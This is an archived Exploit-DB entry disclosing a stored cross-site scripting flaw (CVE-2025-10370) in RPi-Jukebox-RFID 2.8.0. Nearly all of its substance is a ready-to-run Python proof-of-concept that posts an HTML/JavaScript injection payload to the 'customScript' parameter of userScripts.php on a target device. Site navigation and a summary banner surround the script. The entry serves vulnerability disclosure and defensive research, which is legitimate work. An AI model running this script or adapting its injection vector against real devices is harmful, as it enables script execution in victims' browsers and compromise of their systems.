← Back ⬡ Vulnerabilities & CVEs —

[webapps] RPi-Jukebox-RFID 2.8.0 - Stored Cross-Site Scripting (XSS)

Exploit DB Archived Mar 16, 2026 ✓ Full text saved

RPi-Jukebox-RFID 2.8.0 - Stored Cross-Site Scripting (XSS)

Full text archived locally

✦ AI Summary · Claude Sonnet

EXPLOIT DATABASE EXPLOITS GHDB PAPERS SHELLCODES SEARCH EDB SEARCHSPLOIT MANUAL SUBMISSIONS ONLINE TRAINING RPi-Jukebox-RFID 2.8.0 - Stored Cross-Site Scripting (XSS) EDB-ID: 52470 CVE: 2025-10370 EDB Verified: Author: BEATRIZ FRESNO NAUMOVA Type: WEBAPPS Exploit: / Platform: MULTIPLE Date: 2026-02-02 Vulnerable App: # Exploit Title: RPi-Jukebox-RFID 2.8.0 - Stored XSS (CVE-2025-10370) # Date: 2025-09-25 # Exploit Author: Beatriz Fresno Naumova # Vendor Homepage: https://github.com/MiczFlor/RPi-Jukebox-RFID # Software Link: https://github.com/MiczFlor/RPi-Jukebox-RFID/releases/tag/v2.8.0 # Version: 2.8.0 # Tested on: Raspberry Pi OS with RPi-Jukebox-RFID v2.8.0 # CVE: CVE-2025-10370 # # Description: # This PoC demonstrates a Cross-Site Scripting (XSS) vulnerability in the userScripts.php page. # The vulnerable parameter "customScript" does not sanitize input correctly, allowing injection # of arbitrary JavaScript payloads. import requests # Change this to the actual IP or hostname of the target device TARGET = "http://YOUR-TARGET-IP/phoniebox/htdocs/userScripts.php" # The XSS payload PAYLOAD = '"><img src=x onerror=alert("XSS - CVE-2025-10370")>' # HTTP headers headers = { "User-Agent": "Mozilla/5.0", "Content-Type": "application/x-www-form-urlencoded", "Referer": TARGET, } # POST data with the malicious payload data = { "customScript": PAYLOAD } def send_exploit(): print(f"[+] Sending XSS payload to {TARGET}") try: r = requests.post(TARGET, headers=headers, data=data, timeout=5) print(f"[+] Payload sent. Status code: {r.status_code}") print("[*] If the target is vulnerable, the payload will execute when the page is rendered.") except Exception as e: print(f"[-] Exploit failed: {e}") if __name__ == "__main__": send_exploit() Copy Tags: Advisory/Source: Link Databases Links Sites Solutions Exploits Search Exploit-DB OffSec Courses and Certifications Google Hacking Submit Entry Kali Linux Learn Subscriptions Papers SearchSploit Manual VulnHub OffSec Cyber Range Shellcodes Exploit Statistics Proving Grounds Penetration Testing Services

💬 Team Notes